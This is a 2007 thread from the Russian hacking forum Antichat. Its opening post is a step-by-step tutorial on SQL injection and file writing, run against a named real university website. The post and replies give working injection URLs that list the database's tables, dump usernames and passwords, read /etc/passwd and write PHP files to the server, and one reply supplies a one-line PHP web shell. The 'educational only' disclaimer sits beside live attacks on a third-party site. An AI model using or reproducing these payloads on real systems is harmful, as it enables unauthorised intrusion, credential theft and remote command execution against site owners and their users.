Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Загрузка файл через mysql inj. |

27.02.2007, 21:19
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
Загрузка файл через mysql inj.
Загрузка файл через mysql inj.
[INTRO]
Думаю будет полезно новичкам и тем у кого не было практики в этом вопросе. Статья узко направленная, поэтому маленькая по обьему. Побудило меня написать большое кол-во вопросов в icq. Тема Много где обсуждалась но нечего кроме теоритеческих данных не было сегодня мы полностью раскроем этот вопрос и протестим все на конкретном примере.
[хек-хек]
И так начнем.
Наш подопытный:
Есть SQL:
http://research.udmercy.edu/ids/technoclass.php?id=6+union+select+1,2,3,4,5,6/*
Смотрим user() version() database()
http://research.udmercy.edu/ids/technoclass.php?id=99+union+select+1,2,user(),4,5, 6/*
http://research.udmercy.edu/ids/technoclass.php?id=99+union+select+1,2,version(),4 ,5,6/*
http://research.udmercy.edu/ids/technoclass.php?id=99+union+select+1,2,database(), 4,5,6/*
Версия 5 смотрим Какие таблицы есть.
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,table_name,3,4,5,6+from+INF ORMATION_SCHEMA.TABLES/*
Тестовый вывод данных из бд.
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,concat(username,char(58),pa ssword),3,4,5,6+from+accounts+limit+1,2/*
Проверяем на чтение файлов.
http://research.udmercy.edu/ids/technoclass.php?id=-6+UNION+SELECT+1,2,LOAD_FILE('/etc/passwd'),4,5,6/*
C обходом фильтрации (Сдесь не требуеться.)
http://research.udmercy.edu/ids/technoclass.php?id=-6+UNION+SELECT+1,2,LOAD_FILE(0x2f6574632f706173737 764),4,5,6/*
Способ №1
Проверям на запись файла общий синтаксис такой:
http://research.udmercy.edu/ids/technoclass.php?id=99+UNION+SELECT+null,'text',nul l,null,null,null+from+table+into+outfile+'/tmp/file.php'/*
Записываем (Когда будете тестить надо указывать уникальное имя файла, если такой файл уже будет то запись не произайдет. должна вывестись ошибка
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource). Записываемый в файл текст мы кодируем в 0x+hex сделать это можно тут (http://hack-shop.org.ru/?page=6&ln=ru)
http://research.udmercy.edu/ids/technoclass.php?id=-6+UNION+SELECT+null,0x66726f6d205b2063617368205d20 7768697468206c6f7665202929292929,null,null,null,nu ll+from+accounts+into+outfile+'/tmp/aaa.php'/*
Способ №2
http://research.udmercy.edu/ids/technoclass.php?id=6+UNION+SELECT+1,3,4,5,6,7+from +accounts+into+outfile+'/tmp/aaaaaaaaaaaa1.php'+FIELDS+TERMINATED+BY+''+OPTIONA LLY+ENCLOSED+BY+0x74657374/*
Спсоб №3
http://research.udmercy.edu/ids/technoclass.php?id=-6+UNION+SELECT+null,0x66726f6d205b2063617368205d20 7768697468206c6f7665202929292929,null,null,null,nu ll+from+accounts+into+dumpfile+'/tmp/aaaaaaaaa11231.php'/*
Проверям записалось ли???
http://research.udmercy.edu/ids/technoclass.php?id=-6+UNION+SELECT+1,2,LOAD_FILE('/tmp/aaa.php'),4,5,6/*
Записалось.
Полный путь до www
[PS]
Видео урок можно скачать ТУТ
Не стоит дефейсить сайт. Все данные предоставленные в статье предназначены только для ознакомления. С нетерпением жду коментов и вопросов. Спасибо за внимание.
[ cash ] Hack-Shop.Org.Ru (c)
Последний раз редактировалось [ cash ]; 27.02.2007 в 22:51..
|
|
|

27.02.2007, 21:31
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
хыхы. Сказал бы кому спасибо за обнаружение иньекции =)
Статья хорошая, но подобных уже полно
|
|
|

27.02.2007, 21:34
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
2Spyder
Прочитай интро и покажи мне такую же статью
ps иньекцию нашел не я, а Spyder но думаю не это главное...
|
|
|

27.02.2007, 21:47
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме: 2386719
Репутация:
1384
|
|
Все хорошо, только еще стоит уточнить, что для проведения данной атаки у mysql юзера должны быть права на работу с файлами, что в последнее время практически нигде не встречается + при экранировании кавычек into outfile не работает.
P.S. вижу что Слайдер просматривает тему, ща влепит минус за GET =))
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|

27.02.2007, 21:50
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
Ну да ты прав.
экранирование кавычек можно обходить
Да не забываем посылать запросы post методом. а то тема долго не проживет. хотя видео снял 
|
|
|

27.02.2007, 21:51
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме: 4520553
Репутация:
1316
|
|
однотипная статья....таких в инете полно...
[cash] ты пишешь дохрена статей, но все на низком уровне, копай глубже.
То что здесь написано даже ламеры знают... into outfile это не единственный способ вывести инфу в файл..... По крайне мере я знаю 3 способа....
Оценка: 3-
Тема сисек не раскрыта!
|
|
|

27.02.2007, 21:57
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
2k1b0rg
тебя вообще сложно удивить...
|
|
|

27.02.2007, 21:59
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 82
Провел на форуме: 248469
Репутация:
33
|
|
Описанное тут есть в каждой статье по mysql-inj.
Хотелось бы узнать поподробнее про другие способы заливки шелла в mysql. Про into outfile + magic_quotes On тоже хотелось бы узнать 
|
|
|

27.02.2007, 22:47
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
Способ №2
http://research.udmercy.edu/ids/technoclass.php?id=6+UNION+SELECT+1,3,4,5,6,7+from +accounts+into+outfile+'/tmp/aaaaaaaaaaaa1.php'+FIELDS+TERMINATED+BY+''+OPTIONA LLY+ENCLOSED+BY+0x74657374/*
Спсоб №3
http://research.udmercy.edu/ids/technoclass.php?id=-6+UNION+SELECT+null,0x66726f6d205b2063617368205d20 7768697468206c6f7665202929292929,null,null,null,nu ll+from+accounts+into+dumpfile+'/tmp/aaaaaaaaa11231.php'/*
ps обновил
|
|
|

28.02.2007, 01:50
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме: 3025546
Репутация:
1327
|
|
Сообщение от [ cash ]
Ну да ты прав.
экранирование кавычек можно обходить
Если я не ошибаюсь into outfile ''-- работает именно на одинарных ковычках только вида ' но не `.
А так в общем молодец, за труды респект
ps и еще хочу добавить, основная задача ведь не в записи левой строчки в файл а в записи веб шелла <?php system($_GET[cmd]); ?> . Допустим ты создал файл shell.php c данной строчкой в /tmp, но ведь это самый минимум, самое простое. Основная задача пронклудить файл, что сложнее(конечто же если сайт не дырявый). Но может быть альтернатва, если ты раскрыл полный путь и нашел какуе то папочку с правами на запись тогда все проще намного.
Последний раз редактировалось _Pantera_; 28.02.2007 в 02:25..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|